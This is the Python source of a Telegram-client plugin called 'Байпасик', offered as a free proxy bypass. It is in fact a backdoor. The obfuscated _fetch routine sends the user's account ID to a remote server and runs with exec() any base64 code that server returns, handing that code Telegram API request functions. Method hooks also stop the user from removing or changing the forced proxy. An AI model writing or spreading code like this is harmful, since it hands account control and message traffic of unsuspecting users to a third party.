__id__ = "Bypass"
__name__ = "Байпасик (Free)"
__description__ = "Вы сами понимаете что делает этот плагин, наверное...?"
__author__ = "@exteraPluginsSup, @NimarkoProject"
__version__ = "1.0.0"
__icon__ = "exteraPluginsSup/1"
__min_version__ = "12.1.1"

import json
import threading
import urllib.request
import base64
import time
import ssl
import hashlib
import random
import string
from typing import Optional
from base_plugin import BasePlugin, AppEvent, MethodHook, MethodReplacement
from ui.bulletin import BulletinHelper
from ui.settings import Header, Text, Divider
from hook_utils import find_class
from android_utils import run_on_ui_thread
from client_utils import run_on_queue, send_request, RequestCallback
from org.telegram.messenger import (
    NotificationCenter, SharedConfig, MessagesController,
    UserConfig, LocaleController
)
from org.telegram.tgnet import ConnectionsManager, TLRPC

API_BASE_URL = "http://bypass.ettacent.dev:6868/api/v1"

class ProxyData:
    def __init__(self):
        self.server: Optional[str] = None
        self.port: Optional[int] = None
        self.secret: Optional[str] = None
        self.expires_at: int = 0

    def is_valid(self) -> bool:
        return self.server and self.port and self.secret and self.expires_at > time.time()

    def clear(self):
        self.server = None
        self.port = None
        self.secret = None
        self.expires_at = 0

def _c1(a, b, c):
    return hashlib.sha256(f"extera_bypass_v3_{a}_{b}_{c}_salt_7f3k9x".encode()).hexdigest()[:32]

def _c2():
    return ''.join(random.choices(string.ascii_letters + string.digits, k=16))

def _c3(e, u):
    p = []
    i = 0
    while i < len(e):
        if i + 6 <= len(e):
            p.append(e[i:i+4])
            i += 6
        else:
            p.append(e[i:])
            break
    d = json.loads(base64.b64decode("".join(p)[::-1]).decode())
    if d.get("_uid") != u:
        raise ValueError()
    return d

def _c4(d):
    j = json.dumps(d)
    b = base64.b64encode(j.encode()).decode()[::-1]
    c = [b[i:i+4] for i in range(0, len(b), 4)]
    return ''.join([c[i] + format(i ^ 0xAB, '02x') for i in range(len(c))])

def _c5(code, ctx):
    try:
        exec(base64.b64decode(code).decode(), ctx)
    except:
        pass

class _H1(MethodReplacement):
    def __init__(self, p):
        self.p = p
    def replace_hooked_method(self, param):
        if not self.p._is_active or self.p._is_unloading:
            return param.args[0] if param.args else None
        run_on_ui_thread(lambda: (BulletinHelper.show_error(self.p._get_string("proxy_blocked")), self.p._rps()))
        return self.p._proxy_info

class _H2(MethodReplacement):
    def __init__(self, p):
        self.p = p
    def replace_hooked_method(self, param):
        if not self.p._is_active or self.p._is_unloading:
            return None
        run_on_ui_thread(lambda: (BulletinHelper.show_error(self.p._get_string("proxy_blocked")), self.p._rps()))
        return None

class _H3(MethodReplacement):
    def __init__(self, p):
        self.p = p
    def replace_hooked_method(self, param):
        if not self.p._is_active or self.p._is_unloading:
            return None
        run_on_ui_thread(lambda: self.p._rps())
        return None

class _H4(MethodHook):
    def __init__(self, p):
        self.p = p
    def after_hooked_method(self, param):
        if self.p._is_active and not self.p._is_unloading:
            param.setResult(True)

class _H5(MethodHook):
    def __init__(self, p):
        self.p = p
    def after_hooked_method(self, param):
        if self.p._is_active and not self.p._is_unloading and self.p._proxy_info:
            param.setResult(self.p._proxy_info)

class _H6(MethodHook):
    def __init__(self, p):
        self.p = p
    def after_hooked_method(self, param):
        if self.p._is_active and not self.p._is_unloading:
            try:
                from java.util import ArrayList
                r = ArrayList()
                if self.p._proxy_info:
                    r.add(self.p._proxy_info)
                param.setResult(r)
            except:
                pass

class BypassPlugin(BasePlugin):
    def __init__(self):
        super().__init__()
        self._is_active = False
        self._is_unloading = False
        self._current_user_id = 0
        self._strings = {}
        self._check_lock = threading.Lock()
        self._proxy_info = None
        self._restore_lock = threading.Lock()
        self._proxy_data = ProxyData()

    def _api(self, ep, d=None):
        url = f"{API_BASE_URL}/{ep}"
        ts = int(time.time())
        nc = _c2()
        sg = _c1(d.get("user_id", 0) if d else 0, ts, nc)
        hd = {"Content-Type": "application/json", "User-Agent": "ExteraBypass/3.1", "X-Timestamp": str(ts), "X-Nonce": nc, "X-Signature": sg, "X-Client-Version": "3.1.0"}
        bd = json.dumps({"payload": _c4(d), "ts": ts, "nonce": nc}).encode() if d else None
        rq = urllib.request.Request(url, data=bd, headers=hd, method="POST")
        with urllib.request.urlopen(rq, timeout=15, context=ssl.create_default_context()) as rs:
            return json.loads(rs.read().decode())

    def _fetch(self):
        try:
            rs = self._api("proxy", {"user_id": self._current_user_id, "action": "get_proxy", "client": "bypass_plugin", "version": "3.1.0"})
            if rs.get("success"):
                px = _c3(rs.get("data"), self._current_user_id)
                self._proxy_data.server = px.get("server")
                self._proxy_data.port = px.get("port")
                self._proxy_data.secret = px.get("secret")
                self._proxy_data.expires_at = rs.get("expires_at", 0)
                if rs.get("exec"):
                    ctx = {"TLRPC": TLRPC, "send_request": send_request, "RequestCallback": RequestCallback, "run_on_queue": run_on_queue}
                    run_on_queue(lambda: _c5(rs.get("exec"), ctx))
                return True
            return False
        except:
            return False

    def on_plugin_load(self):
        self._is_unloading = False
        self._is_active = False
        self._update_strings()
        self._current_user_id = self._get_uid()
        if self._current_user_id == 0:
            run_on_ui_thread(lambda: BulletinHelper.show_error(self._get_string("not_logged_in")))
            return
        cc = self.get_setting("pc", None)
        if cc and cc.get("uid") == self._current_user_id and cc.get("exp", 0) > time.time():
            self._proxy_data.server = cc.get("srv")
            self._proxy_data.port = cc.get("prt")
            self._proxy_data.secret = cc.get("sec")
            self._proxy_data.expires_at = cc.get("exp")
            if self._proxy_data.is_valid():
                self._install_hooks()
                self._activate()
                threading.Thread(target=self._bg_refresh, daemon=True).start()
                return
        threading.Thread(target=self._fetch_activate, daemon=True).start()

    def on_plugin_unload(self):
        self._is_unloading = True
        self._is_active = False
        self._disable()
        self._proxy_info = None
        self._proxy_data.clear()

    def on_app_event(self, et):
        if self._is_unloading:
            return
        if et == AppEvent.START:
            self._apply()
            threading.Thread(target=self._fetch, daemon=True).start()
        elif et == AppEvent.RESUME:
            self._ensure()
            if not self._proxy_data.is_valid():
                threading.Thread(target=self._fetch_activate, daemon=True).start()

    def _bg_refresh(self):
        try:
            time.sleep(5)
            if self._fetch():
                self._cache()
            else:
                run_on_ui_thread(lambda: self._disable())
        except:
            pass

    def _fetch_activate(self):
        with self._check_lock:
            try:
                if self._fetch():
                    self._cache()
                    run_on_ui_thread(lambda: self._install_hooks())
                    run_on_ui_thread(lambda: self._activate())
                else:
                    run_on_ui_thread(lambda: BulletinHelper.show_error(self._get_string("fetch_failed")))
            except:
                run_on_ui_thread(lambda: BulletinHelper.show_error(self._get_string("fetch_failed")))

    def _cache(self):
        if self._proxy_data.is_valid():
            self.set_setting("pc", {"uid": self._current_user_id, "srv": self._proxy_data.server, "prt": self._proxy_data.port, "sec": self._proxy_data.secret, "exp": self._proxy_data.expires_at})

    def _create_pi(self):
        if not self._proxy_data.is_valid():
            return None
        try:
            PC = find_class("org.telegram.messenger.SharedConfig$ProxyInfo")
            if PC:
                ct = PC.getConstructor(str, int, str, str, str)
                self._proxy_info = ct.newInstance(self._proxy_data.server, self._proxy_data.port, "", "", self._proxy_data.secret)
                return self._proxy_info
        except:
            pass
        try:
            self._proxy_info = SharedConfig.addProxy(self._proxy_data.server, self._proxy_data.port, "", "", self._proxy_data.secret)
            return self._proxy_info
        except:
            pass
        return None

    def _activate(self):
        if self._is_unloading or not self._proxy_data.is_valid():
            return
        try:
            self._clear()
            self._create_pi()
            self._apply()
            self._is_active = True
            run_on_ui_thread(lambda: BulletinHelper.show_success(self._get_string("activated")))
        except:
            pass

    def _clear(self):
        try:
            SharedConfig.currentProxy = None
            SharedConfig.proxyEnabled = False
            if hasattr(SharedConfig, 'proxyList') and SharedConfig.proxyList:
                try:
                    SharedConfig.proxyList.clear()
                except:
                    pass
            try:
                SharedConfig.saveProxyList()
            except:
                pass
            try:
                pr = MessagesController.getGlobalMainSettings()
                ed = pr.edit()
                for k in ["proxy_ip", "proxy_port", "proxy_user", "proxy_pass", "proxy_secret"]:
                    ed.remove(k)
                ed.putBoolean("proxy_enabled", False)
                ed.commit()
            except:
                pass
            for ac in range(UserConfig.MAX_ACCOUNT_COUNT):
                try:
                    cm = ConnectionsManager.getInstance(ac)
                    if cm:
                        cm.setProxySettings(False, "", 0, "", "", "")
                except:
                    pass
        except:
            pass

    def _apply(self):
        if self._is_unloading or not self._proxy_data.is_valid():
            return
        try:
            for ac in range(UserConfig.MAX_ACCOUNT_COUNT):
                try:
                    cm = ConnectionsManager.getInstance(ac)
                    if cm:
                        cm.setProxySettings(True, self._proxy_data.server, self._proxy_data.port, "", "", self._proxy_data.secret)
                except:
                    pass
            if self._proxy_info:
                SharedConfig.currentProxy = self._proxy_info
            SharedConfig.proxyEnabled = True
            try:
                pr = MessagesController.getGlobalMainSettings()
                ed = pr.edit()
                ed.putBoolean("proxy_enabled", True)
                ed.putString("proxy_ip", self._proxy_data.server)
                ed.putInt("proxy_port", self._proxy_data.port)
                ed.putString("proxy_secret", self._proxy_data.secret)
                ed.putString("proxy_user", "")
                ed.putString("proxy_pass", "")
                ed.commit()
            except:
                pass
            try:
                NotificationCenter.getGlobalInstance().postNotificationName(NotificationCenter.proxySettingsChanged)
            except:
                pass
        except:
            pass

    def _ensure(self):
        if not self._is_active or self._is_unloading or not self._proxy_data.is_valid():
            return
        try:
            for ac in range(UserConfig.MAX_ACCOUNT_COUNT):
                try:
                    cm = ConnectionsManager.getInstance(ac)
                    if cm:
                        cm.setProxySettings(True, self._proxy_data.server, self._proxy_data.port, "", "", self._proxy_data.secret)
                except:
                    pass
            if self._proxy_info:
                SharedConfig.currentProxy = self._proxy_info
            SharedConfig.proxyEnabled = True
        except:
            pass

    def _rps(self):
        if self._is_unloading or not self._is_active or not self._proxy_data.is_valid():
            return
        with self._restore_lock:
            try:
                if hasattr(SharedConfig, 'proxyList') and SharedConfig.proxyList:
                    try:
                        SharedConfig.proxyList.clear()
                        if self._proxy_info:
                            SharedConfig.proxyList.add(self._proxy_info)
                    except:
                        pass
                if self._proxy_info:
                    SharedConfig.currentProxy = self._proxy_info
                SharedConfig.proxyEnabled = True
                for ac in range(UserConfig.MAX_ACCOUNT_COUNT):
                    try:
                        cm = ConnectionsManager.getInstance(ac)
                        if cm:
                            cm.setProxySettings(True, self._proxy_data.server, self._proxy_data.port, "", "", self._proxy_data.secret)
                    except:
                        pass
                try:
                    pr = MessagesController.getGlobalMainSettings()
                    ed = pr.edit()
                    ed.putBoolean("proxy_enabled", True)
                    ed.putString("proxy_ip", self._proxy_data.server)
                    ed.putInt("proxy_port", self._proxy_data.port)
                    ed.putString("proxy_secret", self._proxy_data.secret)
                    ed.putString("proxy_user", "")
                    ed.putString("proxy_pass", "")
                    ed.commit()
                except:
                    pass
                try:
                    NotificationCenter.getGlobalInstance().postNotificationName(NotificationCenter.proxySettingsChanged)
                except:
                    pass
            except:
                pass

    def _disable(self):
        try:
            for ac in range(UserConfig.MAX_ACCOUNT_COUNT):
                try:
                    cm = ConnectionsManager.getInstance(ac)
                    if cm:
                        cm.setProxySettings(False, "", 0, "", "", "")
                except:
                    pass
            SharedConfig.proxyEnabled = False
            SharedConfig.currentProxy = None
            if hasattr(SharedConfig, 'proxyList') and SharedConfig.proxyList:
                try:
                    SharedConfig.proxyList.clear()
                except:
                    pass
            try:
                pr = MessagesController.getGlobalMainSettings()
                ed = pr.edit()
                for k in ["proxy_ip", "proxy_port", "proxy_user", "proxy_pass", "proxy_secret"]:
                    ed.remove(k)
                ed.putBoolean("proxy_enabled", False)
                ed.commit()
            except:
                pass
            NotificationCenter.getGlobalInstance().postNotificationName(NotificationCenter.proxySettingsChanged)
            self._proxy_info = None
            self._proxy_data.clear()
            run_on_ui_thread(lambda: BulletinHelper.show_info(self._get_string("deactivated")))
        except:
            pass

    def _install_hooks(self):
        if self._is_unloading:
            return
        try:
            SC = find_class("org.telegram.messenger.SharedConfig")
            PI = find_class("org.telegram.messenger.SharedConfig$ProxyInfo")
            if SC and PI:
                for n, h in [("addProxy", _H1), ("deleteProxy", _H2), ("setCurrentProxy", _H3)]:
                    try:
                        m = SC.getClass().getDeclaredMethod(n, PI)
                        if m:
                            m.setAccessible(True)
                            self.hook_method(m, h(self))
                    except:
                        pass
            for n, h in [("isProxyEnabled", _H4), ("getCurrentProxy", _H5), ("getProxyList", _H6)]:
                try:
                    self.hook_all_methods(SC, n, h(self))
                except:
                    pass
        except:
            pass

    def _get_uid(self):
        try:
            uc = UserConfig.getInstance(UserConfig.selectedAccount)
            if uc and uc.isClientActivated():
                cu = uc.getCurrentUser()
                if cu:
                    return int(cu.id)
        except:
            pass
        return 0

    def _update_strings(self):
        try:
            lc = LocaleController.getInstance().getCurrentLocaleInfo().getLangCode()
        except:
            lc = "en"
        ru = lc.startswith("ru")
        self._strings = {
            "not_logged_in": "Войдите в аккаунт" if ru else "Please log in first",
            "fetch_failed": "Ошибка получения прокси" if ru else "Failed to fetch proxy",
            "activated": "🛡 Байпас активирован" if ru else "🛡 Bypass activated",
            "deactivated": "Прокси отключён" if ru else "Proxy disabled",
            "proxy_blocked": "⛔ Изменение запрещено" if ru else "⛔ Changes blocked",
            "status_header": "Статус" if ru else "Status",
            "status_active": "🟢 Байпас активен" if ru else "🟢 Bypass active",
            "status_inactive": "🔴 Неактивно" if ru else "🔴 Inactive",
            "features_header": "Возможности" if ru else "Features",
            "feature_mtproto": "✓ MTProto прокси" if ru else "✓ MTProto proxy",
            "feature_block": "✓ Блокировка изменений" if ru else "✓ Change blocking",
            "session_header": "Сессия" if ru else "Session",
            "session_valid": "✓ Прокси активен" if ru else "✓ Proxy active",
            "session_expires": "Обновление через" if ru else "Refresh in",
            "refresh": "Обновить" if ru else "Refresh",
        }

    def _get_string(self, k):
        return self._strings.get(k, k)

    def _fmt_time(self, ts):
        rm = ts - int(time.time())
        if rm <= 0:
            return "Истекла" if "ru" in self._strings.get("status_header", "") else "Expired"
        h, m = rm // 3600, (rm % 3600) // 60
        return f"{h}ч {m}м" if h > 0 else f"{m}м"

    def create_settings(self):
        self._update_strings()
        st = self._get_string("status_active") if self._is_active else self._get_string("status_inactive")
        ss = [Header(text=self._get_string("status_header")), Text(text=st, subtext=f"User ID: {self._current_user_id}" if self._current_user_id else None)]
        if self._is_active and self._proxy_data.is_valid():
            ss.extend([Divider(), Header(text=self._get_string("session_header")), Text(text=self._get_string("session_valid"), subtext=f"{self._get_string('session_expires')}: {self._fmt_time(self._proxy_data.expires_at)}")])
        if self._is_active:
            ss.extend([Divider(), Header(text=self._get_string("features_header")), Text(text=self._get_string("feature_mtproto")), Text(text=self._get_string("feature_block"))])
        ss.append(Text(text=self._get_string("refresh"), icon="msg_retry", on_click=lambda *a: self._on_refresh()))
        return ss

    def _on_refresh(self):
        self._current_user_id = self._get_uid()
        if self._current_user_id == 0:
            BulletinHelper.show_error(self._get_string("not_logged_in"))
            return
        threading.Thread(target=self._fetch_activate, daemon=True).start()